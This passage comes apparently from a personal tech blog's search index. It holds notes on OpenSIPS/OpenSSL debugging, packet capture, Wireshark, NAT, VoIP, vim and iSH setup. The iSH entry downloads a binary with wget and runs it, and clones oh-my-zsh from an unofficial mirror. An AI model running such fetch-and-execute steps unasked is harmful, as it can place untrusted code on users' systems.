practice, however, this resulted in a deadlock (see tickets #1590 #1755 , #1767). Although in general it was working fine, the problem appears when there’s a contention trying to acquire the pthread mutex from two different processes at the same time. Imagine process P1 and P2 trying to acquire mutex M in parallel: P1 gets first and acquires M; P2 then tries to acquire it – because M is in shared memory, it detects that M is already acquired (by P1), thus it blocks waiting for it to be released. When P1 finishes the processing, it releases M. However, due to the fact that pthreads by default is not meant to be shared between processes, P2 is not informed that M was released, thus remaining stuck. This was a problem very hard to debug, because when a process gets stuck, the first thing to do is to run a trap (opensipsctl trap) and check which process is blocked. However, when running trap gdb is executed on each OpenSIPS process, therefore each process is “interrupted” to do a GDB dump. Therefore our trap command would actually awake P2, make it re-evaluate the status of M, and basically unblocking the process and “fixing” the “deadlock”.\nThe solution Luckily, after a lot of tests and brainstorming, we managed to pinpoint the issue. The fix was quite simple – all we had to do was to set the PTHREAD_PROCESS_SHARED attribute to the pthread shared mutex. However, these mutexes are encapsulated in the openssl library, and there’s no hooks to tune them. After trying to pick some brains from the OpenSSL team, we realized that they are not interested in supporting that, therefore we had to take this issue in our own hands. That’s when we used a trick to overload the **pthread_mutex_init() **and **pthread_rwlock_init() **with our own implementation, that was also setting the shared attribute. And our SSL/TLS implementation started to work again.\nOpenSSL 1.1.1 new challenges New crashes Once with the OpenSSL 1.1.1 release on 11th of September 2018, new issues started to appear. Due to the fact that the OpenSSL team was trying to make their code base even more thread friendly (without considering the multi-process applications effects), they started to move most of their internal objects in TLS (thread local storage) memory zones. Although OpenSIPS was still allocating OpenSSL contexts in shared memory, these were stored in some locations where only one thread have access. Mixing the two memory management mechanisms resulted in several, unexpected crashes in the SSL library (see ticket #1799).\nFixing attempts After reading the OpenSSL library code and understanding the problem, our first idea was to implement a thread local storage that was compatible with multiple processes. This was our first attempt to fix the issue: overwrite the pthread_key_create(), pthread_getspecific() and pthread_setspecific() functions, similarly to the solution we had for OpenSSL 1.1.0 issues, to make them multi-process aware. Unfortunately our solution failed because of two reasons: although the library was no longer crashing, hence the memory operations were now valid, most of the concurrent connections were rejected (only 2 out of 10 SSL accepts were passing through). So this indicated us that there are still some issues with the internal data – although it is now accessible, most likely there is no concurrent access to it, resulting in unexpected behavior. A second issue with this approach was that overwriting the thread local storage implementation was not only done for the OpenSSL library, but for all the other libraries that were used by OpenSIPS. And since those libraries most likely do not use OpenSIPS managed memory, this might introduce bugs in other libraries – therefore we had to drop this solution.The second attempt to fix this issue came from inspecting the stack trace of the crashes, combined with vitalikvoip‘s suggestion, which were indicating that the problem was within the pseudo random-number generator (RAND_DRBG_bytes()). Therefore we proceeded by using the RAND_set_rand_method() hooks to guard the process of random numbers generators. Although this stopped the crashes, connections were still not properly accepted (again, 8 out of 10 were rejected), so we were back to square one.\nFinal fix Since the problem was not sorted out, we started to dig more into OpenSSL thread safety considerations and discussions (see OpenSSL ticket #2165), and try to understand how these translate to process safety. These made us wonder if it is OK to have a SSL_CTX (the context that manages what certificates, ciphers and other settings are to be used for new connections) shared among all processes. Therefore our next attempt to fix this issue was to duplicate the context (not the connection context, but the global context of SSL) in each process, and use each process’ context to create new connections. And Voillà, OpenSIPS started to accept all the connections, without any issues!After running a set of tests, both by us and our community, we concluded that the issue was the fact that the global SSL context was shared among OpenSIPS processes. Unfortunately this was not a diagnose that we could have come up with easily, due to the fact that this was working just fine up until version 1.1.1, and there were no indications in the OpenSSL documentation that this behavior has changed. Hence, the long-term process of solving this issue.\nConclusions As described throughout the article, running OpenSSL in a multi-process environment, with a context that is shared among multiple processes, is definitely doable. However, without support from the library itself (such as offering locking and memory allocations hooks and providing exhaustive documentation), it becomes more and more complicated to maintain the current implementation. That’s why in the future we are are planning to look into different alternatives for TLS (i.e. more multi-process friendly libraries).But until then, you can use OpenSIPS with the latest OpenSSL TLS implementation without any issues!Many thanks to vitalikvoip and danpascu for their valuable input on the latest matters, as well as to the whole OpenSIPS core team for all the brainstorming sessions for these issues (and not only :)). Although they were not easy to solve, it was definitely a lot of fun dealing with them.If you want to find out more information regarding this topic (and not only), make sure you do not miss this year’s OpenSIPS Summit on 5th-8th May 2020, in Amsterdam, Netherlands.\n","permalink":"https://wdd.js.org/opensips/blog/openssl-opensips/","summary":"In order to provide secure SIP communication over TLS connections, OpenSIPS uses the OpenSSL library, probably the most widely used open-source TLS \u0026amp; SSL library across the Internet. The fact that it is so popular and largely used makes it more robust, therefore a great choice to enforce security in a system! That was the reason it was chosen to be used in OpenSIPS in the first place. However, being designed as a multi-threaded library, while OpenSIPS is a multi-process application, integrating it was not an easy task.","title":"The OpenSIPS and OpenSSL journey"},{"content":"perl: warning: Setting locale failed. perl: warning: Please check that your locale settings: LANGUAGE = (unset), LC_ALL = (unset), LC_CTYPE = \u0026#34;UTF-8\u0026#34;, LANG = \u0026#34;en_US.UTF-8\u0026#34; are supported and installed on your system. perl: warning: Falling back to the standard locale (\u0026#34;C\u0026#34;). add in .bashrc\nexport LANG=en_US.UTF-8 export LANGUAGE=en_US.UTF-8 export LC_COLLATE=C export LC_CTYPE=en_US.UTF-8 source ~/.bashrc\n","permalink":"https://wdd.js.org/posts/2020/12/setting-locale-failed/","summary":"perl: warning: Setting locale failed. perl: warning: Please check that your locale settings: LANGUAGE = (unset), LC_ALL = (unset), LC_CTYPE = \u0026#34;UTF-8\u0026#34;, LANG = \u0026#34;en_US.UTF-8\u0026#34; are supported and installed on your system. perl: warning: Falling back to the standard locale (\u0026#34;C\u0026#34;). add in .bashrc\nexport LANG=en_US.UTF-8 export LANGUAGE=en_US.UTF-8 export LC_COLLATE=C export LC_CTYPE=en_US.UTF-8 source ~/.bashrc","title":"perl: warning: Setting locale failed."},{"content":"使用触摸板,可以左右滑动,来左右滚动只能部分显示的页面。但是在用鼠标的时候,由于鼠标滚轮只能上下滚动页面,所以不太方便。\n此时,你可以按住shift + 滚动鼠标滚轮,来实现左右滚动页面\n","permalink":"https://wdd.js.org/posts/2020/12/yor2t9/","summary":"使用触摸板,可以左右滑动,来左右滚动只能部分显示的页面。但是在用鼠标的时候,由于鼠标滚轮只能上下滚动页面,所以不太方便。\n此时,你可以按住shift + 滚动鼠标滚轮,来实现左右滚动页面","title":"Get: shift + 鼠标滚轮 左右滚动页面"},{"content":"ethereal-tcpdump.pdf\n","permalink":"https://wdd.js.org/network/hhlfi1/","summary":"ethereal-tcpdump.pdf","title":"tcpdump filters"},{"content":"libpcap-tutorial.pdf\n","permalink":"https://wdd.js.org/network/ivzphz/","summary":"libpcap-tutorial.pdf","title":"libpcap tutorial"},{"content":"tcpdump-zine.pdf\n","permalink":"https://wdd.js.org/network/yscigi/","summary":"tcpdump-zine.pdf","title":"tcpdump zine"},{"content":"准备条件 有gcc编译器 安装libpcap包 1.c 试运行 #include \u0026lt;stdio.h\u0026gt; #include \u0026lt;pcap.h\u0026gt; int main(int argc, char *argv[]) { char *dev = argv[1]; printf(\u0026#34;Device: %s\\n\u0026#34;, dev); return(0); } gcc ./1.c -o 1.exe -lpcap demo-libpcap git:(master) ✗ ./1.exe eth0 Device: eth0 第一个栗子非常简单,仅仅是测试相关的库是否加载正确\n2.c 获取默认网卡名称 参考 http://www.tcpdump.org/pcap.html ","permalink":"https://wdd.js.org/network/uq5cii/","summary":"准备条件 有gcc编译器 安装libpcap包 1.c 试运行 #include \u0026lt;stdio.h\u0026gt; #include \u0026lt;pcap.h\u0026gt; int main(int argc, char *argv[]) { char *dev = argv[1]; printf(\u0026#34;Device: %s\\n\u0026#34;, dev); return(0); } gcc ./1.c -o 1.exe -lpcap demo-libpcap git:(master) ✗ ./1.exe eth0 Device: eth0 第一个栗子非常简单,仅仅是测试相关的库是否加载正确\n2.c 获取默认网卡名称 参考 http://www.tcpdump.org/pcap.html ","title":"pcap抓包教程"},{"content":"使用tcpdump在服务端抓包,将抓包后的文件在wireshark中打开。\n然后选择:Telephony - VoIP Calls,wireshark可以从抓包文件中提取出SIP呼叫列表。\n呼叫列表页面 在呼叫列表页面,选择一条呼叫记录,点击Flow Sequence, 可以查看该呼叫的SIP时序图。点击Play Stream, 可以播放该条呼叫的声音。\nRTPplay页面有播放按钮,点击播放可以听到通话声音。\n","permalink":"https://wdd.js.org/network/zgftde/","summary":"使用tcpdump在服务端抓包,将抓包后的文件在wireshark中打开。\n然后选择:Telephony - VoIP Calls,wireshark可以从抓包文件中提取出SIP呼叫列表。\n呼叫列表页面 在呼叫列表页面,选择一条呼叫记录,点击Flow Sequence, 可以查看该呼叫的SIP时序图。点击Play Stream, 可以播放该条呼叫的声音。\nRTPplay页面有播放按钮,点击播放可以听到通话声音。","title":"wireshark从pcap中提取语音文件"},{"content":"tcpdump可以在抓包时,按照指定时间间隔或者按照指定的包大小,产生新的pcap文件。用wireshark分析这些包时,往往需要将这些包做合并或者分离操作。\nmergecap 如果安装了Wireshark那么mergecap就会自动安装,可以使用它来合并多个pcap文件。\n// 按照数据包中的时间顺序合并文件 mergecap -w output.pcap input1.pcap input2.pcap input3.pcap // 按照命令行中的输入数据包文件顺序合并文件 // 不加-a, 可能会导致SIP时序图重复的问题 mergecap -a -w output.pcap input1.pcap input2.pcap input3.pcap editcap 对于一个很大的pcap文件,按照时间范围分割出新的pcap包\neditcap -A \u0026#39;2014-12-10 10:11:01\u0026#39; -B \u0026#39;2014-12-10 10:21:01\u0026#39; input.pcap output.pcap 参考 https://blog.csdn.net/qq_19004627/article/details/82287172 ","permalink":"https://wdd.js.org/network/kgrco2/","summary":"tcpdump可以在抓包时,按照指定时间间隔或者按照指定的包大小,产生新的pcap文件。用wireshark分析这些包时,往往需要将这些包做合并或者分离操作。\nmergecap 如果安装了Wireshark那么mergecap就会自动安装,可以使用它来合并多个pcap文件。\n// 按照数据包中的时间顺序合并文件 mergecap -w output.pcap input1.pcap input2.pcap input3.pcap // 按照命令行中的输入数据包文件顺序合并文件 // 不加-a, 可能会导致SIP时序图重复的问题 mergecap -a -w output.pcap input1.pcap input2.pcap input3.pcap editcap 对于一个很大的pcap文件,按照时间范围分割出新的pcap包\neditcap -A \u0026#39;2014-12-10 10:11:01\u0026#39; -B \u0026#39;2014-12-10 10:21:01\u0026#39; input.pcap output.pcap 参考 https://blog.csdn.net/qq_19004627/article/details/82287172 ","title":"wireshark合并和按时间截取pcap文件"},{"content":"本页介绍 Chrome DevTools 中所有键盘快捷键的参考信息。一些快捷键全局可用,而其他快捷键会特定于单一面板。您也可以在提示中找到快捷键。将鼠标悬停在 DevTools 的 UI 元素上可以显示元素的提示。 如果元素有快捷键,提示将包含快捷键。\n访问 DevTools 访问 DevTools 在 Windows 上 在 Mac 上 打开 Developer Tools F12、Ctrl + Shift + I Cmd + Opt + I 打开/切换检查元素模式和浏览器窗口 Ctrl + Shift + C Cmd + Shift + C 打开 Developer Tools 并聚焦到控制台 Ctrl + Shift + J Cmd + Opt + J 检查检查器(取消停靠第一个后按) Ctrl + Shift + I Cmd + Opt + I 全局键盘快捷键 下列键盘快捷键可以在所有 DevTools 面板中使用:\n全局快捷键 Windows Mac 显示一般设置对话框 ?、F1 ? 光标定位到地址栏 Ctrl + L Cmd + L 下一个面板 Ctrl + ] Cmd + ] 上一个面板 Ctrl + [ Cmd + [ 在面板历史记录中后退 Ctrl + Alt + [ Cmd + Opt + [ 在面板历史记录中前进 Ctrl + Alt + ] Cmd + Opt + ] 更改停靠位置 Ctrl + Shift + D Cmd + Shift + D 打开 Device Mode Ctrl + Shift + M Cmd + Shift + M 切换控制台/在设置对话框打开时将其关闭 Esc Esc 刷新页面 F5、Ctrl + R Cmd + R 刷新忽略缓存内容的页面 Ctrl + F5、Ctrl + Shift + R Cmd + Shift + R 在当前文件或面板中搜索文本 Ctrl + F Cmd + F 在所有源中搜索文本 Ctrl + Shift + F Cmd + Opt + F 按文件名搜索(除了在 Timeline 上) Ctrl + O、Ctrl + P Cmd + O、Cmd + P 放大(焦点在 DevTools 中时) Ctrl + + Cmd + Shift + + 缩小 Ctrl + - Cmd + Shift + - 恢复默认文本大小 Ctrl + 0 Cmd + 0 按面板分类的键盘快捷键 Elements Elements 面板 Windows Mac 撤消更改 Ctrl + Z Cmd + Z 重做更改 Ctrl + Y Cmd + Y、Cmd + Shift + Z 导航 向上键、向下键 向上键、向下键 展开/折叠节点 向右键、向左键 向右键、向左键 展开节点 点击箭头 点击箭头 展开/折叠节点及其所有子节点 Ctrl + Alt + 点击箭头图标 Opt + 点击箭头图标 编辑属性 Enter、双击属性 Enter、双击属性 隐藏元素 H H 切换为以 HTML 形式编辑 F2 Styles 边栏 Styles 边栏中可用的快捷键:\nStyles 边栏 Windows Mac 编辑规则 点击 点击 插入新属性 点击空格 点击空格 转到源中样式规则属性声明行 Ctrl + 点击属性 Cmd + 点击属性 转到源中属性值声明行 Ctrl + 点击属性值 Cmd + 点击属性值 在颜色定义值之间循环 Shift + 点击颜色选取器框 Shift + 点击颜色选取器框 编辑下一个/上一个属性 Tab、Shift + Tab Tab、Shift + Tab 增大/减小值 向上键、向下键 向上键、向下键 以 10 为增量增大/减小值 Shift + Up、Shift + Down Shift + Up、Shift + Down 以 10 为增量增大/减小值 PgUp、PgDown PgUp、PgDown 以 100 为增量增大/减小值 Shift + PgUp、Shift + PgDown Shift + PgUp、Shift + PgDown 以 0.1 为增量增大/减小值 Alt + 向上键、Alt + 向下键 Opt + 向上键、Opt + 向下键 Sources Sources 面板 Windows Mac 暂停/继续脚本执行 F8、Ctrl + \\ F8、Cmd + \\ 越过下一个函数调用 F10、Ctrl + ' F10、Cmd + ' 进入下一个函数调用 F11、Ctrl + ; F11、Cmd + ; 跳出当前函数 Shift + F11、Ctrl + Shift + ; Shift + F11、Cmd + Shift + ; 选择下一个调用框架 Ctrl + . Opt + . 选择上一个调用框架 Ctrl + , Opt + , 切换断点条件 点击行号、Ctrl + B 点击行号、Cmd + B 编辑断点条件 右键点击行号 右键点击行号 删除各个单词 Ctrl + Delete Opt + Delete 为某一行或选定文本添加注释 Ctrl + / Cmd + / 将更改保存到本地修改 Ctrl + S Cmd + S 保存所有更改 Ctrl + Alt + S Cmd + Opt + S 转到行 Ctrl + G Ctrl + G 按文件名搜索 Ctrl + O Cmd + O 跳转到行号 Ctrl + P + 数字 Cmd + P + 数字 跳转到列 Ctrl + O + 数字 + 数字 Cmd + O + 数字 + 数字 转到成员 Ctrl + Shift + O Cmd + Shift + O 关闭活动标签 Alt + W Opt + W 运行代码段 Ctrl + Enter Cmd + Enter 在代码编辑器内 代码编辑器 Windows Mac 转到匹配的括号 Ctrl + M 跳转到行号 Ctrl + P + 数字 Cmd + P + 数字 跳转到列 Ctrl + O + 数字 + 数字 Cmd + O + 数字 + 数字 切换注释 Ctrl + / Cmd + / 选择下一个实例 Ctrl + D Cmd + D 撤消上一个选择 Ctrl + U Cmd + U Timeline Timeline 面板 Windows Mac 开始/停止记录 Ctrl + E Cmd + E 保存时间线数据 Ctrl + S Cmd + S 加载时间线数据 Ctrl + O Cmd + O Profiles Profiles 面板 Windows Mac 开始/停止记录 Ctrl + E Cmd + E 控制台 控制台快捷键 Windows Mac 接受建议 向右键 向右键 上一个命令/行 向上键 向上键 下一个命令/行 向下键 向下键 聚焦到控制台 Ctrl + ` Ctrl + ` 清除控制台 Ctrl + L Cmd + K、Opt + L 多行输入 Shift + Enter Ctrl + Return 执行 Enter Return Device Mode Device Mode 快捷键 Windows Mac 双指张合放大和缩小 Shift + 滚动 Shift + 滚动 抓屏时 抓屏快捷键 Windows Mac 双指张合放大和缩小 Alt + 滚动、Ctrl + 点击并用两个手指拖动 Opt + 滚动、Cmd + 点击并用两个手指拖动 检查元素工具 Ctrl + Shift + C Cmd + Shift + C ","permalink":"https://wdd.js.org/posts/2020/11/muk33s/","summary":"本页介绍 Chrome DevTools 中所有键盘快捷键的参考信息。一些快捷键全局可用,而其他快捷键会特定于单一面板。您也可以在提示中找到快捷键。将鼠标悬停在 DevTools 的 UI 元素上可以显示元素的提示。 如果元素有快捷键,提示将包含快捷键。\n访问 DevTools 访问 DevTools 在 Windows 上 在 Mac 上 打开 Developer Tools F12、Ctrl + Shift + I Cmd + Opt + I 打开/切换检查元素模式和浏览器窗口 Ctrl + Shift + C Cmd + Shift + C 打开 Developer Tools 并聚焦到控制台 Ctrl + Shift + J Cmd + Opt + J 检查检查器(取消停靠第一个后按) Ctrl + Shift + I Cmd + Opt + I 全局键盘快捷键 下列键盘快捷键可以在所有 DevTools 面板中使用:","title":"Chrome 键盘快捷键参考"},{"content":"when considered in conjunction with deployment architectures that include 1:M and M:N combinations of Application Servers and Media Servers\nMedia Resource Broker (MRB) entity, which manages the availability of Media Servers and the media resource demands of Application Servers. The document includes potential deployment options for an MRB and appropriate interfaces to Application Servers and Media Servers.\n","permalink":"https://wdd.js.org/posts/2020/11/ig536h/","summary":"when considered in conjunction with deployment architectures that include 1:M and M:N combinations of Application Servers and Media Servers\nMedia Resource Broker (MRB) entity, which manages the availability of Media Servers and the media resource demands of Application Servers. The document includes potential deployment options for an MRB and appropriate interfaces to Application Servers and Media Servers.","title":"RFC 6917 笔记"},{"content":"4种NAT类型 NAT类型 接收数据前是否要先发送数据 有没有可能检测下一个IP:PORT对是否打开 是否限制发包目的的IP:PORT 全锥型 no yes no 限制锥型 yes yes only IP 端口限制型 yes yes yes 对称型 yes no yes NAT穿透 • STUN: Simple traversal of UDP over NAT• TURN: Traversal of UDP over Relay NAT• ALG: Application Layer Gateways• MANUAL: Manual configuration (port forwarding)• UPNP: Universal Plug and Play\n","permalink":"https://wdd.js.org/posts/2020/11/nh68ws/","summary":"4种NAT类型 NAT类型 接收数据前是否要先发送数据 有没有可能检测下一个IP:PORT对是否打开 是否限制发包目的的IP:PORT 全锥型 no yes no 限制锥型 yes yes only IP 端口限制型 yes yes yes 对称型 yes no yes NAT穿透 • STUN: Simple traversal of UDP over NAT• TURN: Traversal of UDP over Relay NAT• ALG: Application Layer Gateways• MANUAL: Manual configuration (port forwarding)• UPNP: Universal Plug and Play","title":"NAT"},{"content":"What Is a Busy Lamp Field (BLF) and Why Do You Need It? Busy lamp field is a presence indicator that allows you to see who in your organization is available (or not) for a phone call at any given time.\nThe term “busy lamp field” sounds a bit more involved than it really is. Put simply, it just means the ability to see who in your organization is available or not for a phone call at any given time.\nBusy Lamp Field Overview Maybe this analogy will help: You’re in New York City, and you need to flag down a yellow cab. (Let’s pretend Uber isn’t a thing for a minute.) The cabs with their roof light on are available. The cabs with their light off are occupied. If the cab’s roof light is lit up—but not the number, just the words “off duty”—they’re unavailable. Make sense? BLF is much the same, just for office phones: a light indication of who’s available to talk, who’s on the phone, and who’s “off duty” for the moment. If you’re familiar with the term “presence,” BLF is the same thing, just specific to phone extensions. So why do you want these flashing lights in your line of sight? They allow you to monitor your coworkers in real time during the workday. Now, before you go all 1984 on us, let us clarify how this isn’t a Big Brother type of monitoring: BLF is a vital tool for anyone whose job relies on phone calls—think sales, reception, or support. Imagine having to physically check if someone was available for a call. Besides being a wildly inefficient way to spend your day, it also means the caller is left hanging on hold for however long it takes you to find your coworker. And what do you do if the coworker in question is in a different office, in a different state, or even in a different country? An active busy lamp field eliminates this problem altogether. Busy lamp field lets you know who’s available for a call transfer with a single glance.So how does this work in an actual office setting?Take Michael in Sales, for example. He’s on the phone with a customer who has a very specific question that’s best answered by Malcolm. Michael can glance at his OnSIP app screen and immediately see if Malcolm is available, on a call, or logged out at that exact moment. If available, Michael can immediately transfer the customer over to Malcolm. If unavailable, Michael can take a message, send the customer to Malcolm’s voicemail, or suggest another agent who is available.\nBusy Lamp Field on Desk Phones: BLF Keys Whether your main desk phone knowledge comes from reruns of The Office or you use one every day, you’ve undoubtedly seen tiny lights blinking on a panel of side buttons. While each phone is unique in its setup, nearly all desk phones have these buttons—BLF keys—to the side of a small screen that you can connect to various extensions. It’s up to you which extensions you configure on your phone—other lines of your own, the coworkers you call the most, people to whom you tend to transfer phone calls, or even your boss. The BLF keys will show different colors, regularly green and red or orange, based on which extensions are currently in use so that you always have an overview of who’s available.If you’d like to set up BLF on your desk phone, our Knowledgebase will help you configure the OnSIP specifics. Each phone has its own guide to colors, flashing status, and configuration, so follow the instructions provided by your particular phone model. BLF keys light up red to indicate a line is in use.\nBusy Lamp Field in the OnSIP Softphone App: BLF Presence The OnSIP app takes a desk phone’s busy lamp field and upgrades it for our current technological norms. Most of us here at OnSIP use our desktop app rather than physical phones. Because we have a contacts panel on the left side of the app, presence is automatically shown for everyone. As an added bonus, the apps also show you how long someone’s been on a call. Here’s how busy lamp field appears in the OnSIP app:\nGreen: Available Orange: Away Cerise: Busy Desk phones have a limited number of BLF keys to configure, so you have to pick and choose which colleagues will be visible to you or constantly switch it around based on daily needs. With the OnSIP softphone, everyone is visible in a single glance.To give you an idea of how they differ, here’s a comparison view of BLF as it appears in the app and on a desk phone: How BLF Affects Real-Time Communications WebRTC is a huge part of telecom innovations right now, and OnSIP is no exception. We’ve launched **sayso, **a web-based calling solution that lets your site visitors call or video chat straight from any webpage. It’s a fantastic business tool, but we’ll let you read about that elsewhere—this post is all about busy lamp field, after all.Real-time communication is a wonderful thing, and it wouldn’t be quite as functional without busy lamp field. If sayso couldn’t tell which agents were available to chat, how would it function? Exactly. (We assumed you answered, “It wouldn’t” in your head.) We mentioned above how BLF is simply a phone-specific type of presence—it tells you that a phone is plugged in and can take a call—and certainly the most common form of the feature.Presence factors into how sayso works but with a few key differences. Typical BLF isn’t quite advanced enough for sayso—it requires a more enhanced form of presence. We designed our proprietary presence system to take the typical BLF “available” status to the next level and instead say, “Yes, this person is sitting at their phone at this exact moment and is ready to take your call.” Presence is an essential part of sayso.Busy lamp field is an integral part of the workday for anyone who needs to call a coworker or whose job description heavily features the word “call.” Whether you prefer a desktop interface or a physical handset balanced against your ear, you should be able to glance at your phone of choice and see which coworkers are available at any time. The name might be a mouthful, but that’s probably why it’s just a visual cue anyway.\n参考资料 https://www.onsip.com/voip-resources/voip-fundamentals/what-is-a-busy-lamp-field-blf-and-why-do-you-need-it PDF附件 GXV32xx_broadworks_BLF_Guide.pdf 1501643005322.pdf Quick_Setup_BLF_List_on_Yealink_IP_Phones_with_BroadSoft_UC_ONE_v1.0.pdf ","permalink":"https://wdd.js.org/opensips/ch9/blf/","summary":"What Is a Busy Lamp Field (BLF) and Why Do You Need It? Busy lamp field is a presence indicator that allows you to see who in your organization is available (or not) for a phone call at any given time.\nThe term “busy lamp field” sounds a bit more involved than it really is. Put simply, it just means the ability to see who in your organization is available or not for a phone call at any given time.","title":"BLF指示灯"},{"content":"1. 将源码包上传到服务器, 并解压 安装依赖 apt update apt install autoconf \\ libtool \\ libtool-bin \\ libjpeg-dev \\ libsqlite3-dev \\ libspeex-dev libspeexdsp-dev \\ libldns-dev \\ libedit-dev \\ libtiff-dev \\ libavformat-dev libswscale-dev libsndfile-dev \\ liblua5.1-0-dev libcurl4-openssl-dev libpcre3-dev libopus-dev libpq-dev 配置 ./bootstrap.sh ./configure make make \u0026amp;\u0026amp; make install 参考:https://www.cnblogs.com/MikeZhang/p/RaspberryPiInstallFreeSwitch.html\n","permalink":"https://wdd.js.org/posts/2020/11/gtrrng/","summary":"1. 将源码包上传到服务器, 并解压 安装依赖 apt update apt install autoconf \\ libtool \\ libtool-bin \\ libjpeg-dev \\ libsqlite3-dev \\ libspeex-dev libspeexdsp-dev \\ libldns-dev \\ libedit-dev \\ libtiff-dev \\ libavformat-dev libswscale-dev libsndfile-dev \\ liblua5.1-0-dev libcurl4-openssl-dev libpcre3-dev libopus-dev libpq-dev 配置 ./bootstrap.sh ./configure make make \u0026amp;\u0026amp; make install 参考:https://www.cnblogs.com/MikeZhang/p/RaspberryPiInstallFreeSwitch.html","title":"树莓派安装fs 1.10"},{"content":"为了能够在所有环境达到一致且极致的编程体验。我已经准备了好长的时间,从vscode切换到vim上做开发。\n我的切换计划分为多个阶段:\n尝试:使用vim编辑单个文件 练习:在vscode上安装vim插件,用了一段时间,感觉很别扭。 徘徊:尝试使用vim作为开发,用了一段时间后,我发现开发速度相比于vim上很慢。特别是多文件编辑,文件创建。没有vscode编辑器的那种文件侧边栏,感觉写代码不太真实,云里雾里的感觉。然后我就又切换到vscode上开发。 精进:我一直认为我vim已经学的差不多了,但是用vim的时候,总是感觉使不上劲。我觉得我没有系统的学习vim。然后我就去找了vim方面的书籍《vim实用技巧》。这本书我看过第一遍,我觉得自己之前对vim的理解太过肤浅。然后我就找机会从书中学习的技巧练习写代码。这本书我看了不下于三遍,每次看都有收获。每每遇到困惑的地方,我就会随手去查查。然后做总结。 切换:从今年双十一,我开始使用vim做开发,直到今天,我一直都没有使用vscode, 并且我也把vscode卸载了。我之所以敢于卸载vscode, 是因为我觉得我在vim上开发的效率,已经高于vscode。 熟练运用vim之后,我发现在vim上切换文件,打开文件还是创建文件,速度非常快,完全不需要鼠标点击。\n除了没有右边的代码预览视图,vim功能都有。而且我越用越觉得vim的netrw插件要比vscode左边栏的文件树窗口好用。\n还有代码搜索,我使用了ack, 用这个命令搜索关键词,简直快的飞起。\n","permalink":"https://wdd.js.org/vim/from-vscode-to-vim/","summary":"为了能够在所有环境达到一致且极致的编程体验。我已经准备了好长的时间,从vscode切换到vim上做开发。\n我的切换计划分为多个阶段:\n尝试:使用vim编辑单个文件 练习:在vscode上安装vim插件,用了一段时间,感觉很别扭。 徘徊:尝试使用vim作为开发,用了一段时间后,我发现开发速度相比于vim上很慢。特别是多文件编辑,文件创建。没有vscode编辑器的那种文件侧边栏,感觉写代码不太真实,云里雾里的感觉。然后我就又切换到vscode上开发。 精进:我一直认为我vim已经学的差不多了,但是用vim的时候,总是感觉使不上劲。我觉得我没有系统的学习vim。然后我就去找了vim方面的书籍《vim实用技巧》。这本书我看过第一遍,我觉得自己之前对vim的理解太过肤浅。然后我就找机会从书中学习的技巧练习写代码。这本书我看了不下于三遍,每次看都有收获。每每遇到困惑的地方,我就会随手去查查。然后做总结。 切换:从今年双十一,我开始使用vim做开发,直到今天,我一直都没有使用vscode, 并且我也把vscode卸载了。我之所以敢于卸载vscode, 是因为我觉得我在vim上开发的效率,已经高于vscode。 熟练运用vim之后,我发现在vim上切换文件,打开文件还是创建文件,速度非常快,完全不需要鼠标点击。\n除了没有右边的代码预览视图,vim功能都有。而且我越用越觉得vim的netrw插件要比vscode左边栏的文件树窗口好用。\n还有代码搜索,我使用了ack, 用这个命令搜索关键词,简直快的飞起。","title":"从VSCode切换到VIM"},{"content":"我在家里的时候,大部分时间用iPad远程连接到服务端做开发。虽然也是蛮方便的,但是每年都需要买个云服务器,也是一笔花费,最近看到一个App, 可以在手机上直接运行一个Linux环境,试了一下,果然还不错。下面记录一下安装过程。\nstep1: 下载iSh step2: 安装apk 这个软件下载之后打开,就直接进到shell界面,虽然它是一个基于alpine的环境,但是没有apk, 我们需要手工安装这个包管理工具。\nwget -qO- http://dl-cdn.alpinelinux.org/alpine/v3.12/main/x86/apk-tools-static-2.10.5-r1.apk | tar -xz sbin/apk.static \u0026amp;\u0026amp; ./sbin/apk.static add apk-tools \u0026amp;\u0026amp; rm sbin/apk.static \u0026amp;\u0026amp; rmdir sbin 2\u0026gt; /dev/null 温馨提示:在iSh的右下角,有个按钮是粘贴按钮。\nstep3: apk update 虽然安装了apk, 但是不更新的话,可能很多安装包都没有,所以最好先更新。\n在更新之前。最好执行下面的命令,把apk的源换成清华的,这样之后的安装软件会比较快点。\nsed -i \u0026#39;s/dl-cdn.alpinelinux.org/mirrors.tuna.tsinghua.edu.cn/g\u0026#39; /etc/apk/repositories apk update step4: 安装各种开发工具 git zsh tmux vim\u0026hellip; apk add git zsh tmux vim step5: 安装oh-my-zsh 这是必不可少的神器 因为从github上克隆oh-my-zsh可能会很慢,所以我用了码云上的一个仓库。 这样速度就会很快了。\ngit clone https://gitee.com/nuannuande/oh-my-zsh.git ~/.oh-my-zsh cp ~/.oh-my-zsh/templates/zshrc.zsh-template ~/.zshrc chsh -s $(which zsh) step6: 安装nodejs python golang等。 apk add nodejs python3 下面看到输出了nodejs和python的版本,说明安装成功。另外ish支持换肤的。之前的白色的,下面的是黑色的。\nstep7: vim写个hello world吧 vim index.html\nstep8: 监听端口可以吗? 写web服务器就不赘述了,直接用python自带的静态文件服务器吧。\npython3 -m http.server 这会打开一个静态文件服务器,监听在8000端口。\n我们打开自带的safari浏览器看看,能否访问这个页面。\nhello world出现。完美!!!\nstep9: 后台运行 后台运行的思路是:\n使用tmux 创建一个新的sesssion 这这个session中执行下面的命令。下面的命令实际上是获取你的位置信息,当App切到后台时,位置在后台刷新,保证ish能够后台运行。当然这需要给予位置权限。你也可以收工输入 cat /dev/location 看看会发生什么。 cat /dev/location \u0026gt; /dev/null \u0026amp; FAQ 有些人会问,ish不支持多标签页,怎么同时做很多事情呢? 问这个问题,说明你还没用过tmux这个工具,建议你先学学tmux。 ","permalink":"https://wdd.js.org/posts/2020/11/kfl9zd/","summary":"我在家里的时候,大部分时间用iPad远程连接到服务端做开发。虽然也是蛮方便的,但是每年都需要买个云服务器,也是一笔花费,最近看到一个App, 可以在手机上直接运行一个Linux环境,试了一下,果然还不错。下面记录一下安装过程。\nstep1: 下载iSh step2: 安装apk 这个软件下载之后打开,就直接进到shell界面,虽然它是一个基于alpine的环境,但是没有apk, 我们需要手工安装这个包管理工具。\nwget -qO- http://dl-cdn.alpinelinux.org/alpine/v3.12/main/x86/apk-tools-static-2.10.5-r1.apk | tar -xz sbin/apk.static \u0026amp;\u0026amp; ./sbin/apk.static add apk-tools \u0026amp;\u0026amp; rm sbin/apk.static \u0026amp;\u0026amp; rmdir sbin 2\u0026gt; /dev/null 温馨提示:在iSh的右下角,有个按钮是粘贴按钮。\nstep3: apk update 虽然安装了apk, 